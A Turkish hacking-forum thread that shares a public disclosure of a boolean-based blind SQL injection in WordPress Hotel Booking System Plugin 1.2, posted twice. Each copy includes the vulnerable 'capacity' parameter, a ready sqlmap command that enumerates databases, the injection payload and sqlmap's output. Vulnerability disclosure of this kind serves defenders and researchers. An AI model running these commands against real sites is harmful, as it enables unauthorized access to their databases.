WP Hotel Booking System Plugin 1.2 - SQL Injection / Pentester

Pentester

Özel Üye
8 Eyl 2016
1,646
995
WordPress Hotel Booking System Plugin 1.2 üzerinde yaptığım test sonucunda bulduğum, "Boolean-Based Blind SQL İnjection" zaafiyetini public ettim. Aynı zamanda videolu olarak anlattım.
Bug:
https://cxsecurity.com/issue/WLB-2017050039

Kod:
<------------------ header data start ------------------- >
#############################################################
# Application Name : WP Hotel Booking System Plugin 1.2 
# Vulnerable Type : Boolean-Based Blind SQL İnjection
# Software Link: https://www.bestsoftinc.com/
# Tested On Demo Site:
http://envato.bestsoftinc.net/wp-hotel/
# Author: Siber Güvenlik Akademisi - Pentester
# Date: 05.05.2017
# Tested on: Windows 8.1 / Mozilla Firefox
# Vulnerable Parameter: 'capacity' (POST)
# SQLİ: Http://localhost/wphotel/
# Proof of concept:
sqlmap -u "http://localhost/wphotel/" --data="check_in=05%2F05%2F2017&check_out=05%2F20%2F2017&capacity=1&child_per_room=1" -p "capacity" --random-agent --threads=5 --dbs

Parameter: capacity (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: check_in=05/10/2017&check_out=06/26/2017&capacity=1 AND 6953=6953&c
hild_per_room=1
---
[20:44:25] [INFO] testing MySQL
[20:44:28] [INFO] confirming MySQL
[20:44:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16

< ------------------- header data end of ------------------- >

VİDEO

[ame]https://www.youtube.com/watch?v=eBeA2Pzg0Ro&feature=youtu.be[/ame]
 

'GonzaLes

Yaşayan Forum Efsanesi
17 Nis 2015
11,778
252
85
Kayseri
Ooo pentest coşturmuş buraları haberimiz yok :D
Zaafiyet kodlarına kadar sağlık kardeşim cansın :)
 

Pentester

Özel Üye
8 Eyl 2016
1,646
995
Ellerine sağlık :)

ellerine sağlık ;).




Ooo pentest coşturmuş buraları haberimiz yok :D
Zaafiyet kodlarına kadar sağlık kardeşim cansın :)

Teşekkürler arkadaşlar :)
 

T4K0M4N1X

Uzman üye
14 Mar 2017
1,313
22
WordPress Hotel Booking System Plugin 1.2 üzerinde yaptığım test sonucunda bulduğum, "Boolean-Based Blind SQL İnjection" zaafiyetini public ettim. Aynı zamanda videolu olarak anlattım.
Bug:
https://cxsecurity.com/issue/WLB-2017050039

Kod:
<------------------ header data start ------------------- >
#############################################################
# Application Name : WP Hotel Booking System Plugin 1.2 
# Vulnerable Type : Boolean-Based Blind SQL İnjection
# Software Link: https://www.bestsoftinc.com/
# Tested On Demo Site:
http://envato.bestsoftinc.net/wp-hotel/
# Author: Siber Güvenlik Akademisi - Pentester
# Date: 05.05.2017
# Tested on: Windows 8.1 / Mozilla Firefox
# Vulnerable Parameter: 'capacity' (POST)
# SQLİ: Http://localhost/wphotel/
# Proof of concept:
sqlmap -u "http://localhost/wphotel/" --data="check_in=05%2F05%2F2017&check_out=05%2F20%2F2017&capacity=1&child_per_room=1" -p "capacity" --random-agent --threads=5 --dbs

Parameter: capacity (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: check_in=05/10/2017&check_out=06/26/2017&capacity=1 AND 6953=6953&c
hild_per_room=1
---
[20:44:25] [INFO] testing MySQL
[20:44:28] [INFO] confirming MySQL
[20:44:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16

< ------------------- header data end of ------------------- >
VİDEO

https://www.youtube.com/watch?v=eBeA2Pzg0Ro&feature=youtu.be
ellerine sağlık
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.